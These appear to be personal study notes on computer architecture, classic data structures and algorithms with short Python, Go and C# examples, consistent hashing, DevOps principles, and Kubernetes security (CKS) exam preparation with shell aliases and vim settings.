  • The von Neumann architecture consists of five components:
    1. Processing Unit:

      • Composed of the Arithmetic/Logic Unit (ALU) and Registers.
      • The ALU performs mathematical operations (addition, subtraction, etc.).
      • Registers are fast storage units for program data and instructions being executed.
    2. Control Unit:

      • Responsible for loading instructions from memory and coordinating execution with the processing unit.
      • Contains the Program Counter (PC) and Instruction Register (IR).
    3. Memory Unit:

      • Stores program data and instructions in Random Access Memory (RAM).
      • RAM provides fast, direct access to memory locations via unique addresses.
    4. Input Unit:

      • Loads program data and instructions into the computer.
    5. Output Unit:

      • Stores or displays program results.

Fetch-Decode-Execute-Store (FEDS) Cycle

  1. Fetch: The control unit fetches the next instruction from memory using the program counter. The control unit places that address on the address bus and increments the PC. It also places the read command on the control bus. The memory unit then reads the bytes stored at the address and places them on the data bus which is then read by the control unit. The instruction register stores the bytes of the instruction received from the memory unit.
  2. Decode: The control unit decodes the instruction stored in the instruction register. It decodes the opcode and operands, determining what action to take.
  3. Execute: The processing unit executes the instruction. The ALU performs the necessary calculations or data manipulations.
  4. Store: Results are stored in memory or registers.
  • Example: In modern systems, 32-bit processors can address up to 2^32 bytes of memory (4 GB).

Memory and Addressing

  • Smallest Addressable Unit: In modern systems, the smallest addressable memory unit is 1 byte (8 bits).
  • 32-bit vs. 64-bit Architectures:
    • 32-bit systems: Address up to 2^32 bytes (4 GB).
    • 64-bit systems: Address up to 2^64 bytes (16 exabytes).
  • Memory Hierarchy:
    • Registers > Cache > RAM > Secondary Storage.
    • Each layer balances speed and capacity, with registers being the fastest but smallest.

The von Neumann Bottleneck

  • Definition: The limitation caused by the shared bus between memory and the CPU, which slows data transfer.
  • Consequences:
    • Slower execution of memory-intensive programs.
    • Limits on parallel execution.
  • Mitigation:
    • Use of caches to reduce frequent memory access.
    • Development of pipelining and out-of-order execution to improve instruction throughput.

Modern Innovations in Computer Architecture

  • Harvard Architecture:
    • Separates data and instruction memory, reducing the von Neumann bottleneck.
  • Multicore Processors:
    • Incorporate multiple CPUs (cores) on a single chip for parallel execution.
  • Pipelining:
    • Breaks instruction execution into stages, allowing multiple instructions to be processed simultaneously.
    • Each instruction takes 4 cycles: fetch, decode, execute, store, resulting in a CPI (cycles per instruction) of 4
    • The control circuitry of a CPU can be tweaked to obtain a better CPI value
    • The CPU circuitry involved in each of the 4 stages is only actively used once every 4 cycles; for the other 3 cycles it sits idle. For example, after the fetch stage of a given instruction, the fetch circuitry sits idle for the remaining 3 clock cycles of that instruction. Pipelining lets the fetch circuitry begin fetching the next instruction during those idle cycles. Put another way, CPU pipelining is the idea of starting the execution of the next instruction before the current instruction has fully completed, so sequences of instructions overlap.
    • The Intel Core i7 has a 14 stage pipeline
    • A pipeline stall occurs when any stage of execution is forced to wait on another before it can continue
  • Speculative Execution:
    • Predicts and executes instructions before they are needed, increasing efficiency.
  • Graphics Processing Units (GPUs):
    • Specialized processors optimized for parallel computation, commonly used in machine learning and graphics.
  • RISC-V:
    • A modern open-standard RISC architecture gaining popularity for its flexibility and extensibility.

Building a Processor

  • The CPU implements the processing and control units of the von Neumann architecture.
  • Key components include the ALU, registers, and control unit.

ALU

  • Performs all arithmetic and logical operations on signed and unsigned integers. A separate floating point unit performs arithmetic on floating-point numbers.
  • The ALU takes integer operands and opcode values that specify an operation to perform on the operands

Registers

  • Fast, small storage units within the CPU that hold data and instructions being executed.
  • Common registers include the Program Counter (PC), Instruction Register (IR), and General-Purpose Registers (GPRs).
  • The CPU’s set of general-purpose registers is organized into a register file circuit.
    • A register file consists of a set of register circuits for storing data values and some control circuits for controlling reads and writes to its registers

Data Structures

I’m a huge proponent of designing your code around the data, rather than the other way around, and I think it’s one of the reasons git has been fairly successful… I will, in fact, claim that the difference between a bad programmer and a good one is whether he considers his code or his data structures more important. Bad programmers worry about the code. Good programmers worry about data structures and their relationships. - Linus Torvalds

  • A data structure is a way of organizing data in a computer so programmers can effectively use it in their programs.
  • An abstract data type is a description of a data structure, whereas a data structure is an actual implementation.
  • Computer scientists classify data structures based on different properties. For example, whether they are linear or non-linear.
    • Linear data structures arrange elements in a sequence.
    • Non-linear data structures link data non-sequentially
  • Traversing a data structure means to walk through the data structure one element at a time without backtracking. In a non-linear data structure, you often need to backtrack.
  • Computer scientists also classify data structure by whether they are static or dynamic:
    • static: fixed size
    • dynamic: can grow or shrink

Arrays

  • An array is a data structure that stores elements with indexes in a contiguous block of memory
  • Arrays are indexed by a key, with a key taking the form of an offset from the starting location in memory. The first element of an array is 0 elements away from the start, the next is 1 element from the start, and so on. “One element away” could be a byte, a word, etc., depending on the size of the data.
  • Retrieving or storing any element takes constant time (O(1)), and the entire array takes O(n) space. Inserting and deleting elements in an array is O(n), which is slow, as every element after the insertion or deletion point may need to be moved.
  • When the number of elements is known when first creating the array, there is no wasted space.
  • Iterating through an array is likely to be much faster than any other data structure because of fewer cache misses.
  • Arrays are often homogeneous (homo = one kind, geneous/genous = producing) and static. A homogeneous data structure can only hold data of one type.

Stacks

  • A stack is an abstract data type and a linear data structure that allows you to remove only the most recently added element.
  • You can imagine a stack as a pile of books. You can add or remove only the top book.
  • Last in, first out (LIFO) data structure
  • You can push items onto the stack and pop items off of the stack
  • Stacks can be bounded (limited in size) or unbounded
  • You can create a stack with a class that internally uses an array or linked list to keep track of items
  • Pushing and popping items from a stack are all O(1)
  • Programs typically use stacks internally to track function calls

Examples

class Stack:
    def __init__(self):
        self.items = []

    def push(self, item):
        self.items.append(item)

    def size(self):
        return len(self.items)

    def peek(self):
        if len(self.items) == 0:
            return None
        return self.items[-1]

    def pop(self):
        if len(self.items) == 0:
            return None
        item = self.items[-1]
        del self.items[-1]
        return item

#------------
from stack import Stack

def is_balanced(input_str):
    s = Stack()
    for i in input_str:
        if i == "(":
            s.push(i)
        elif i == ")":
            result = s.pop()
            if result == None:
                return False

    if s.size() != 0:
        return False
    return True
// a stack implementation

package main

import (
        "fmt"
)

type stack []string

func (s *stack) push(val string) {
        *s = append(*s, val)
}

func (s *stack) pop() (string, bool) {
        if s.isEmpty() {
                return "", false
        }
        index := len(*s) - 1
        element := (*s)[index]
        *s = (*s)[:index]
        return element, true
}

func (s *stack) isEmpty() bool {
        return len(*s) == 0
}

func main() {
        var s stack

        fmt.Println("empty: ", s.isEmpty())

        s.push("hello")
        s.push("world")

        fmt.Println("length: ", len(s))
        fmt.Println("empty: ", s.isEmpty())

        fmt.Println("popping")
        val, _ := s.pop()
        fmt.Println("popped:", val)
}

Heap

  • a heap is a data structure which satisfies the heap ordering property: in a min-heap the value of each node is no smaller than the value of its parent, and in a max-heap the value of each node is no larger than the value of its parent. A max-heap is a rooted, nearly complete binary tree where the key of the root is greater than the keys of its children, and this is recursively true for the subtree rooted at each child.
  • a max-heap supports the operations find-max, extract-max (pop), insert (push), and increase-key (change a node’s key and then move the node to its new position in the heap)
  • heaps, like stacks, tend to be implemented with arrays
  • only one element can be removed at a time (also similar to stacks), but rather than the most recent element, it will be the maximum element (for a max-heap) or the minimum element (for a min-heap)
  • heaps are partially ordered based on the key of each element, such that the highest (or lowest) priority element is always stored at the root (see the sketch below)
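
Python's standard-library heapq module implements a binary min-heap on top of a plain list; a minimal sketch (negating keys is a common trick when max-heap behaviour is wanted):
import heapq

nums = [5, 1, 9, 3, 7]

heap = []
for n in nums:
    heapq.heappush(heap, n)       # push: O(log n) per insert

print(heap[0])                    # peek at the minimum: 1
print(heapq.heappop(heap))        # extract-min: 1
print(heapq.heappop(heap))        # next smallest: 3

# Max-heap behaviour by storing negated keys
max_heap = [-n for n in nums]
heapq.heapify(max_heap)           # O(n) heap construction
print(-heapq.heappop(max_heap))   # extract-max: 9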

Queues

  • A queue is an abstract data type and a linear data structure which you can add items only to the rear and remove them from the front.
  • First in, first out (FIFO) data structure
  • Enqueueing means adding an item to the queue, dequeueing means removing an item from the queue
  • Queues work like the checkout lines at a grocery store.
  • A bounded queue limits how many items you can add to it.
  • Enqueueing, dequeueing, peeking, and getting the length of the queue are all O(1) regardless of the queue’s size (see the sketch below)
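
A minimal sketch of a queue that mirrors the Stack class above, using collections.deque because popping from the front of a plain Python list is O(n):
from collections import deque

class Queue:
    def __init__(self):
        self.items = deque()

    def enqueue(self, item):
        self.items.append(item)        # add to the rear: O(1)

    def dequeue(self):
        if not self.items:
            return None
        return self.items.popleft()    # remove from the front: O(1)

    def peek(self):
        return self.items[0] if self.items else None

    def size(self):
        return len(self.items)

q = Queue()
q.enqueue("first")
q.enqueue("second")
print(q.dequeue())  # first
print(q.peek())     # second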

Linked Lists

  • Similar to arrays, but elements in a linked list do not have indexes because your computer does not store the items in a linked list in sequential memory. Instead, a linked list contains a chain of nodes, with each node holding a piece of data and the next node’s location in the chain. The data in each node that stores the next node’s location in the linked list is called a pointer. The first node in a linked list is called a head. The last element in a linked list points to None. head > a > b > c > none
  • The only way to access an item in a linked list is to do a linear search for it, which is O(n). Adding or removing a node at a known position (such as the head) is O(1), whereas inserting and deleting items from an array is O(n).
  • Memory management systems in operating systems use linked lists extensively, as do databases
  • There are many types of linked lists:
    • singly linked list: a type of linked list with pointers that point only to the next element. You can move through a singly linked list only by starting at the head and moving to the end.
    • doubly linked list: each node contains two pointers, one pointing to the next node and one pointing to the previous node. This allows you to move through a doubly linked list in either direction.
    • circular linked list: the last node points back to the first node
  • Unlike normal lists, linked lists are not stored sequentially in memory, so they can grow and shrink dynamically without needing to reallocate or reorganize memory.

Example:

class Node:
    def __init__(self, val):
        self.val = val
        self.next = None
        
    def set_next(self, next_node):
        self.next = next_node

    def __repr__(self):
        return self.val
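
A minimal sketch of building and traversing a singly linked list (a trimmed-down Node is re-declared here so the snippet runs on its own; the LinkedList class is made up for illustration):
class Node:
    def __init__(self, val):
        self.val = val
        self.next = None

class LinkedList:
    def __init__(self):
        self.head = None

    def push_front(self, val):
        # O(1): the new node simply points at the old head
        node = Node(val)
        node.next = self.head
        self.head = node

    def traverse(self):
        # O(n): walk node to node until we fall off the end
        current = self.head
        while current is not None:
            print(current.val)
            current = current.next

ll = LinkedList()
for letter in ["c", "b", "a"]:
    ll.push_front(letter)
ll.traverse()  # a, b, c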

Hash Tables

  • Hash tables are associative arrays that map keys to values
  • Dictionaries are one implementation of hash tables commonly found in programming languages
  • Hash tables use a hash function to convert a key into an index in an array where the corresponding value is stored
  • The hash function should:
    • Take a key and return an integer
    • Always return the same integer for the same key
    • Always return a valid index in the array
  • A hash collision can occur when two keys hash to the same index.
  • To determine the index where a value is stored in a hash table, a hash function is used. One common hash function is to modulo the number you are storing in the hash table by the number of values the hash table can store. For example, you have a hash table that can store 7 values. You want to store the number 90. 90%7=6, so you would store the number 90 at index 6. This method can result in collisions if you have two values whose modulo results in the same index number.
  • a collision occurs when you have multiple values that map to the same spot.
  • The lookup, insertion, and deletion operations of a hash table are all O(1) on average (a minimal sketch follows below).
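
A minimal sketch of a hash table that uses the modulo approach described above, with a list per slot (chaining) to absorb collisions; the class and method names are made up for illustration:
class HashTable:
    def __init__(self, capacity=7):
        # one list ("bucket") per slot so colliding keys can share a slot
        self.buckets = [[] for _ in range(capacity)]
        self.capacity = capacity

    def _index(self, key):
        # hash() -> integer, modulo -> always a valid bucket index
        return hash(key) % self.capacity

    def put(self, key, value):
        bucket = self.buckets[self._index(key)]
        for i, (k, _) in enumerate(bucket):
            if k == key:
                bucket[i] = (key, value)   # overwrite an existing key
                return
        bucket.append((key, value))

    def get(self, key):
        for k, v in self.buckets[self._index(key)]:
            if k == key:
                return v
        return None

table = HashTable()
table.put("name", "Ada")
table.put("language", "Python")
print(table.get("name"))      # Ada
print(table.get("missing"))   # None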

Trees

  • Trees are a hierarchical data structure made up of nodes connected by edges. A tree starts with a root node at the top. Each node can have child nodes connected underneath it. Nodes with child nodes are called parent nodes. Nodes that share the same parent are called sibling nodes. The connection between two nodes is called an edge. Nodes without child nodes are called leaf nodes, while nodes with child nodes are called branch nodes.
  • Trees are like linked lists in the sense that a root node holds references to its child nodes. However, tree nodes can have multiple children instead of just one.
  • A tree structure must abide by the following rules:
    • A tree node can have a value and a list of references to child nodes.
    • Children can only have a single parent

Binary Search Trees (BST)

[Images: Binary Search Tree; Binary Search Tree in O(n)]

  • Trees are not particularly useful unless they are ordered in some way. One of the most common types of trees is a binary search tree.
  • In addition to the constraints of a tree structure, a BST adds the following constraints:
    • Instead of an unbounded list of children, a parent node can only have two children
    • The left child’s value must be less than its parent’s value
    • The right child’s value must be more than its parent’s value.
    • No two nodes in the tree can have identical values
  • Because of the constraints listed above, binary search trees are ordered ‘by default’, making them very performant.

Example:

import random

class User:
    def __init__(self, id):
        self.id = id
        user_names = [
            "Blake",
            "Ricky",
            "Shelley",
            "Dave",
            "George",
            "John",
            "James",
            "Mitch",
            "Williamson",
            "Burry",
            "Vennett",
            "Shipley",
            "Geller",
            "Rickert",
            "Carrell",
            "Baum",
            "Brownfield",
            "Lippmann",
            "Moses",
        ]
        self.user_name = f"{user_names[id % len(user_names)]}#{id}"

    def __eq__(self, other):
        return isinstance(other, User) and self.id == other.id

    def __lt__(self, other):
        return isinstance(other, User) and self.id < other.id

    def __gt__(self, other):
        return isinstance(other, User) and self.id > other.id

    def __repr__(self):
        return "".join(self.user_name)


def get_users(num):
    random.seed(1)
    users = []
    ids = []
    for i in range(num * 3):
        ids.append(i)
    random.shuffle(ids)
    ids = ids[:num]
    for id in ids:
        user = User(id)
        users.append(user)
    return users

# The Binary Search Tree Node class
class BSTNode:
    def __init__(self, val=None):
        self.left = None
        self.right = None
        self.val = val

    def insert(self, val):
        if not self.val:
            self.val = val
            return

        if self.val == val:
            return

        if val < self.val:
            if not self.left:
                self.left = BSTNode(val=val)
            else:
                self.left.insert(val)
        else:
            if not self.right:
                self.right = BSTNode(val=val)
            else:
                self.right.insert(val)
  • Inserting into a BST is O(log n) on average, but O(n) in the worst case (when each node has a single child, essentially creating a linked list.)
  • While it’s true that on average a BST has a time complexity of O(log n) for lookups, deletions, and insertions. This rule can quickly break down if the data is mostly or completely sorted. If mostly or completely sorted data is inserted into a binary tree, the tree will become deeper than it is wide. The BST’s time complexity depends on it being balanced, meaning that the left and right subtrees of any node differ in height by no more than one. If the tree becomes unbalanced, the time complexity for lookups, deletions, and insertions can degrade to O(n) in the worst case.

Red Black Trees

  • A red-black tree is a self-balancing binary search tree where each node has an extra bit for denoting the color of the node, either red or black. By constraining the node colors on any path from the root to a leaf, red-black trees ensure that no such path is more than twice as long as any other, thus the tree remains approximately balanced.
  • red/black = true/false
  • Properties of red-black trees:
    • Each node is either red or black
    • The root is always black
    • All null leaf nodes are black
    • If a node is red, both its children must be black (no two reds in a row)
    • All paths from a given node down to its descendant leaf nodes pass through the same number of black nodes
  • When a branch starts to get too long, the tree rotates and recolors nodes to maintain balance ….

Tries

  • A trie is simply a nested tree of dictionaries, where each key is a character that maps to the next character in a string. The end of a string is often marked with a special terminating character, such as an asterisk (*).
  • Example:
    {
        "h": {
            "e": {
                "l": {
                    "l": {
                        "o": {
                            "*": True
                        }
                    },
                    "p": {
                        "*": True
                    }
                }
            },
            "i": {
                "*": True
            }
        }
    }
    
  • Tries are often used in autocomplete systems, spell checkers, and IP routing algorithms. ….
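
A minimal sketch of inserting into and searching a trie built from nested dictionaries, using the same "*" terminator as the example above:
END = "*"

def insert(trie: dict, word: str) -> None:
    node = trie
    for char in word:
        node = node.setdefault(char, {})  # walk/create one level per character
    node[END] = True                      # mark the end of a complete word

def contains(trie: dict, word: str) -> bool:
    node = trie
    for char in word:
        if char not in node:
            return False
        node = node[char]
    return END in node

trie = {}
for word in ["hello", "help", "hi"]:
    insert(trie, word)

print(contains(trie, "help"))   # True
print(contains(trie, "hel"))    # False (prefix only, not a stored word)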

Graphs

  • A graph is a non-linear data structure made up of vertices (nodes) and edges that connect them.
  • A graph can be represented as a matrix
  • Example:
[
  [False, True, False, False, True],
  [True, False, True, True, True],
  [False, True, False, True, False],
  [False, True, True, False, True],
  [True, True, False, True, False]
]
  • An undirected graph can have up to n(n-1)/2 edges, where n is the number of vertices ….

Breadth-First Search (BFS)

  • BFS is an algorithm for traversing tree or graph data structures
  • It starts at the root (or an arbitrary node in the case of a graph) and explores all of the neighbor nodes at the present depth prior to moving on to the nodes at the next depth level.
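
A minimal sketch of BFS over a graph stored as an adjacency list (the graph itself is made up); a queue holds the frontier, so nodes are visited level by level:
from collections import deque

graph = {
    "A": ["B", "C"],
    "B": ["A", "D"],
    "C": ["A", "D"],
    "D": ["B", "C", "E"],
    "E": ["D"],
}

def bfs(start):
    visited = {start}
    queue = deque([start])
    order = []
    while queue:
        node = queue.popleft()          # FIFO: oldest discovered node first
        order.append(node)
        for neighbor in graph[node]:
            if neighbor not in visited:
                visited.add(neighbor)
                queue.append(neighbor)
    return order

print(bfs("A"))  # ['A', 'B', 'C', 'D', 'E']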

Depth-First Search (DFS)

  • DFS is an algorithm for traversing tree or graph data structures
  • It starts at the root (or an arbitrary node in the case of a graph) and explores as far as possible along each branch before backtracking.
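
A minimal sketch of recursive DFS over the same kind of adjacency list; each branch is explored as deeply as possible before backtracking:
graph = {
    "A": ["B", "C"],
    "B": ["A", "D"],
    "C": ["A", "D"],
    "D": ["B", "C", "E"],
    "E": ["D"],
}

def dfs(node, visited=None):
    if visited is None:
        visited = set()
    visited.add(node)
    print(node)                      # process the node on the way down
    for neighbor in graph[node]:
        if neighbor not in visited:
            dfs(neighbor, visited)   # go deeper before trying siblings

dfs("A")  # A, B, D, C, E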

Euclid’s Algorithm

  • Euclid’s Algorithm is an efficient way to find the greatest common factor of two numbers. First, you divide x by y and take the remainder. Then you divide again, using the remainder as the new y and the previous y as the new x. You continue this process until the remainder is 0. The last non-zero remainder (the divisor in the final step) is the greatest common factor.

For example:

20 mod 12 = 8
12 mod 8 = 4
8 mod 4 = 0 // remainder is 0, so the GCF is 4

The greatest common factor of 20 and 12 is 4

def greatestCommonFactor(x,y):
  if y == 0:
    x,y = y,x
  while y != 0:
    x,y = y,x % y
  return x

fizzbuzz

Examples

  • Python
def fizzbuzz(n):
    for i in range(1, n + 1):
        if i % 3 == 0 and i % 5 == 0:
            print('FizzBuzz')
        elif i % 3 == 0:
            print('Fizz')
        elif i % 5 == 0:
            print('Buzz')
        else:
            print(i)
  • Go
package main

import "fmt"

func main() {
    for i := 1; i <= 100; i++ {
        if i%3 == 0 {
            fmt.Printf("fizz")
        }
        if i%5 == 0 {
            fmt.Printf("buzz")
        }
        if i%3 != 0 && i%5 != 0 {
            fmt.Printf("%d", i)
        }
        fmt.Printf("\n")
    }
}
  • C#
for (int i = 1; i <= 100; i++)  
{  
    if (i % 3 == 0 && i % 5 == 0)  
    {  
        Console.WriteLine("FizzBuzz");  
    }  
    else if (i % 3 == 0)  
    {  
       Console.WriteLine("Fizz");  
    }  
    else if (i % 5 == 0)  
    {  
       Console.WriteLine("Buzz");  
    }  
    else  
    {  
        Console.WriteLine(i);  
    }  
}

Graph Theory

A good way to learn about graph theory is the Konigsberg bridge problem. The town of Konigsberg had a river flowing through it, the river divided the city into four regions, which were connected by seven bridges. The question arose of whether it might be possible to take a walk through the city, crossing every bridge only once.

[Image: the seven bridges of Konigsberg]

We can simplify the map by replacing each region with a vertex and each bridge with an edge between two vertices:

[Image: the bridge map reduced to a graph of vertices and edges]

The key logical insight is that entering and leaving a landmass requires two separate bridges, so any landmass which is not the starting or ending position must be the endpoint of an even number of bridges. In the case of Konigsberg, all four regions were the endpoint of an odd number of bridges, making the problem unsolvable. A path through a graph which visits every edge exactly once is now called an Eulerian path.

Converting the map to a graph allows us to avoid Parkinson’s Law of Triviality.

A graph is a way of representing relationships in a set of data. When discussing the size of a graph, we often use ‘n’ for the number of vertices (nodes) and ‘m’ for the number of edges. The amount of space the graph requires depends on how we store the data. Two common methods are adjacency lists and adjacency matrices.

  • Adjacency list: each node of the graph is stored with a list of the nodes it is adjacent to.
  • Adjacency matrix: an n x n grid of booleans (or weights) where entry (i, j) indicates whether an edge connects vertex i to vertex j. A sketch of both representations follows below.
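
A minimal sketch of one small undirected graph stored both ways (the vertices and edges are made up):
# Vertices 0..3 with edges 0-1, 0-2, 1-2, 2-3

# Adjacency list: each vertex maps to the vertices it touches.
adjacency_list = {
    0: [1, 2],
    1: [0, 2],
    2: [0, 1, 3],
    3: [2],
}

# Adjacency matrix: entry [i][j] is True when an edge connects i and j.
adjacency_matrix = [
    [False, True,  True,  False],
    [True,  False, True,  False],
    [True,  True,  False, True],
    [False, False, True,  False],
]

# Both answer "are 1 and 2 connected?" -- the matrix in O(1),
# the list by scanning vertex 1's neighbours.
print(2 in adjacency_list[1])   # True
print(adjacency_matrix[1][2])   # True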

Hashing

Why we need hashing

To achieve horizontal scaling, it is important to distribute requests/data efficiently across servers.

Traditional (modulus) Hashing

If you have n cache servers, a common way to balance the load is to use the following hash method:

serverIndex = hash(key) % n, where n is the number of servers in the pool

Suppose we have 4 servers in the pool and 8 string keys with their hashes:

key     hash        hash % 4
key0    18358617    1
key1    26143584    0
key2    18131146    2
key3    35863496    0
key4    34085809    1
key5    27581703    3
key6    38164978    2
key7    22530351    3

To fetch the server where a key is stored, we perform the modular operation hash(key) % 4. For example, hash(key0) % 4 = 1 means the client must contact server 1 to fetch the cached data.

This approach works well when the size of the server pool doesn’t change. However, if servers are added or removed, the mapping changes. For example, if we remove a server, the hash function becomes hash(key) % 3. A client that already had data in the cache will now compute a different server index, one that does not hold its cached data, resulting in cache misses. When one server goes offline or is removed, most cache clients end up connecting to the wrong servers to fetch data (a small demonstration follows below). Consistent hashing is a method to fix this problem.
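
A small demonstration of the remapping problem (the keys are hypothetical, and hashlib is used so the hashes are stable across runs): shrinking the pool from 4 servers to 3 typically moves most of the keys to a different server.
import hashlib

def server_index(key: str, num_servers: int) -> int:
    # stable integer hash of the key, then modulo the pool size
    digest = hashlib.md5(key.encode()).hexdigest()
    return int(digest, 16) % num_servers

keys = [f"key{i}" for i in range(8)]

moved = 0
for key in keys:
    before = server_index(key, 4)   # 4 servers in the pool
    after = server_index(key, 3)    # one server removed from the pool
    if before != after:
        moved += 1
    print(key, before, "->", after)

print(f"{moved} of {len(keys)} keys now map to a different server")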

Consistent Hashing

Consistent hashing is a technique used in distributed systems to divide data among multiple caching servers or nodes. It aims to evenly distribute the data and minimize the amount of data that needs to be moved when nodes are added or removed from the system.

With consistent hashing, the hash space is represented as a ring, also known as a hash ring. Each server is assigned a position on the ring based on its hash value. The data is also hashed, and its hash value is mapped onto the ring. To determine which server should store the data, the position of the data’s hash value is found on the ring, and the next server in a clockwise direction on the ring becomes the data’s assigned server.

This approach provides several advantages:

  1. Load balancing: Since the servers are evenly distributed on the ring, the data is also distributed evenly, minimizing hotspots and ensuring a balanced load across the nodes.
  2. Scalability: When a new server is added, only a portion of the data needs to be remapped to the new server, reducing the overall amount of data movement. Similarly, when a server is removed, only the data assigned to that server needs to be redistributed.
  3. Fault tolerance: In the event of a server failure, only the data assigned to that server needs to be remapped, minimizing the impact on the overall system.
  4. Consistency: The term “consistent” in consistent hashing refers to the stability of the mapping between data and servers. In traditional hashing, small changes in the number of servers can drastically change the assignment of data, but consistent hashing minimizes such changes.

Overall, consistent hashing allows for efficient and dynamic data distribution in distributed systems, enabling scalability, fault tolerance, and load balancing.
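
A minimal sketch of a hash ring (no virtual nodes, and the server names are made up): servers and keys are hashed onto the same ring, and each key is assigned to the first server found moving clockwise from the key's position.
import bisect
import hashlib

def ring_position(name: str) -> int:
    # hash anything (server name or cache key) onto the same numeric ring
    return int(hashlib.md5(name.encode()).hexdigest(), 16)

class HashRing:
    def __init__(self, servers):
        # each server sits at a fixed position on the ring
        self.ring = sorted((ring_position(s), s) for s in servers)
        self.positions = [pos for pos, _ in self.ring]

    def get_server(self, key: str) -> str:
        # first server clockwise from the key's position; wrap around at the end
        i = bisect.bisect_right(self.positions, ring_position(key)) % len(self.ring)
        return self.ring[i][1]

ring = HashRing(["server0", "server1", "server2", "server3"])
for key in ["key0", "key1", "key2", "key3"]:
    print(key, "->", ring.get_server(key))

# Removing a server only remaps the keys that were assigned to it;
# every other key keeps its current server.
smaller = HashRing(["server0", "server1", "server2"])
for key in ["key0", "key1", "key2", "key3"]:
    print(key, "->", smaller.get_server(key))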

string algorithms

Anagram Detection

  • Two strings are anagrams if they contain the same letters, but not necessarily in the same order.
  • ‘car’ and ‘arc’ are anagrams
  • The key to determining if 2 strings are anagrams is to sort them. If the sorted strings are the same, they are anagrams.
  • Rules for creating an algorithm to determine if 2 strings are anagrams (see the sketch after this list):
    • remove spaces in the words
    • convert all letters to lowercase
    • trim spaces if necessary
    • sort the strings
    • compare the strings to see if they are the same
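
A minimal sketch that follows the rules above:
def is_anagram(first: str, second: str) -> bool:
    # normalize: strip spaces and ignore case before comparing
    first = first.replace(" ", "").lower()
    second = second.replace(" ", "").lower()
    # sorting puts the letters of true anagrams into the same order
    return sorted(first) == sorted(second)

print(is_anagram("car", "arc"))               # True
print(is_anagram("Dormitory", "dirty room"))  # True
print(is_anagram("car", "care"))              # False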

Palindrome Detection

  • A palindrome is a word that reads the same backward as forward
  • Hannah, mom, wow, and racecar are all examples of palindromes
  • A simple way to check whether a string is a palindrome is to make a reversed copy of it and compare the reversed copy to the original. If they are equal, the string is a palindrome (see the sketch below).
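
A minimal sketch: reverse a copy of the (lowercased) string with slicing and compare it to the original:
def is_palindrome(word: str) -> bool:
    word = word.lower()          # "Hannah" should match "hannah"
    return word == word[::-1]    # compare the string to its reverse

for word in ["Hannah", "mom", "wow", "racecar", "python"]:
    print(word, is_palindrome(word))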

DevOps

Directory Map

DevOps Principles

  1. Customer-centric action - All activity around building software must frequently involve the clients
  2. Create with the end in mind - Focus on building a whole product that is being presented to real customers
  3. End-to-end responsibility - All members of a devops team are responsible for the software they deliver
  4. Cross-functional autonomous teams - Organizations that work with vertical and fully responsible teams will need to let those teams work completely independently throughout the whole life cycle. To do this, each team member must have a broad range of skills, ranging from administration to development.
  5. Continuous Improvement - Adapt to changes continuously
  6. Automate everything - focus on automation in everything that you do

The four stages of the SDLC:

  • Plan
  • Develop
  • Deliver
  • Operate

Kubernetes

Directory Map

CKS

Directory Map

Certified Kubernetes Security Specialist (CKS) Notes

https://www.cncf.io/certification/cks/

Exam

Outline

  • https://github.com/cncf/curriculum/blob/master/CKS_Curriculum%20v1.31.pdf

Curriculum

Exam objectives that outline the knowledge, skills, and abilities that a Certified Kubernetes Security Specialist (CKS) can be expected to demonstrate.

Cluster Setup (10%)

Cluster Hardening (15%)

System Hardening (15%)

Minimize Microservice Vulnerabilities (20%)

Supply Chain Security (20%)

  • Minimize base image footprint

    • Remove exploitable and non-essential software
    • Use multi-stage Dockerfiles to keep software compilation out of runtime images
    • Never bake any secrets into your images
    • Image scanning
  • Secure your supply chain: whitelist allowed image registries, sign and validate images

  • Use static analysis of user workloads (e.g. kubernetes resources, docker files)

    • Secure base images
    • Remove unnecessary packages
    • Stop containers from using elevated privileges
  • Scan images for known vulnerabilities

Monitoring, Logging and Runtime Security (20%)

Changes

  • https://kodekloud.com/blog/cks-exam-updates-2024-your-complete-guide-to-certification-with-kodekloud/
  • https://training.linuxfoundation.org/cks-program-changes/

Software / Environment

As of 11/2024

  • Kubernetes version: 1.31
  • Ubuntu 20.04
  • Terminal
    • Bash
  • Tools available
    • vim - Text/Code editor
    • tmux - Terminal multiplexor
    • jq - Working with JSON format
    • yq - Working with YAML format
    • firefox - Web Browser for accessing K8s docs
    • base64 - Tool to convert to and from base 64
    • kubectl - Kubernetes CLI Client
    • more typical linux tools like grep, wc
  • 3rd Party Tools to know
    • tracee
    • OPA Gatekeeper
    • kubebench
    • syft
    • grype
    • kube-linter
    • kubesec
    • trivy
    • falco

Exam Environment Setup

Terminal Shortcuts/Aliases

The following are useful terminal aliases and shortcuts to use during the exam.

Add the following to the end of ~/.bashrc file:

alias k='kubectl'                                       # <-- Most general and useful shortcut!

alias kd='kubectl delete --force --grace-period=0'      # <-- Fast deletion of resources

alias kc='kubectl create'                               # <-- Create a resource
alias kc-dry='kubectl create --dry-run=client -o yaml'  # <-- Create a YAML template of a resource

alias kr='kubectl run'                                  # <-- Run/Create a resource (typically a pod)
alias kr-dry='kubectl run --dry-run=client -o yaml'     # <-- Create a YAML template of a resource

# If kc-dry and kr-dry do not autocomplete, add the following

export do="--dry-run=client -o yaml"                    # <-- Create the YAML template (usage: $do)

The following are some example usages:

k get nodes -o wide
kc deployment my-dep --image=nginx --replicas=3
kr-dry my-pod --image=nginx --command -- sleep 36000
kr-dry my-pod --image=busybox -- /bin/sh -c "sleep 36000"
kr my-pod --image=busybox $do -- /bin/sh -c "sleep 36000"

Terminal Command Completion

The following is useful so that you can use the TAB key to auto-complete a command, allowing you to not always have to remember the exact keyword or spelling.

Type the following into the terminal:

- kubectl completion bash >> ~/.bashrc - kubectl command completion
- kubeadm completion bash >> ~/.bashrc - kubeadm command completion
- exec $SHELL - Reload the shell to enable all added completions

VIM

The exam will have VIM or nano terminal text editor tools available. If you are using VIM ensure that you create a ~/.vimrc file and add the following:

set ts=2 " <-- tabstop - how many spaces is \t worth
set sw=2 " <-- shiftwidth - how many spaces is indentation
set et " <-- expandtab - Use spaces, never \t values
set mouse=a " <-- Enable mouse support

Or simply:

set ts=2 sw=2 et mouse=a

Also know the VIM basics listed below. It may be a good idea to take a quick VIM course.

  • vim my-file.yaml - If file exists, open it, else create it for editing
  • :w - Save
  • :x - Save and exit
  • :q - Exit
  • :q! - Exit without saving
  • i - Insert mode, regular text editor mode
  • v - Visual mode for selection
  • ESC - Normal mode

Pasting Text Into VIM

Oftentimes you will want to paste text or code from the Kubernetes documentation into a VIM terminal. If you simply do that, the tabs will do funky things.

Do the following inside VIM before pasting your copied text:

  1. In NORMAL mode, type :set paste
  2. Now enter INSERT mode
     • You should see -- INSERT (paste) -- at the bottom of the screen
  3. Paste the text
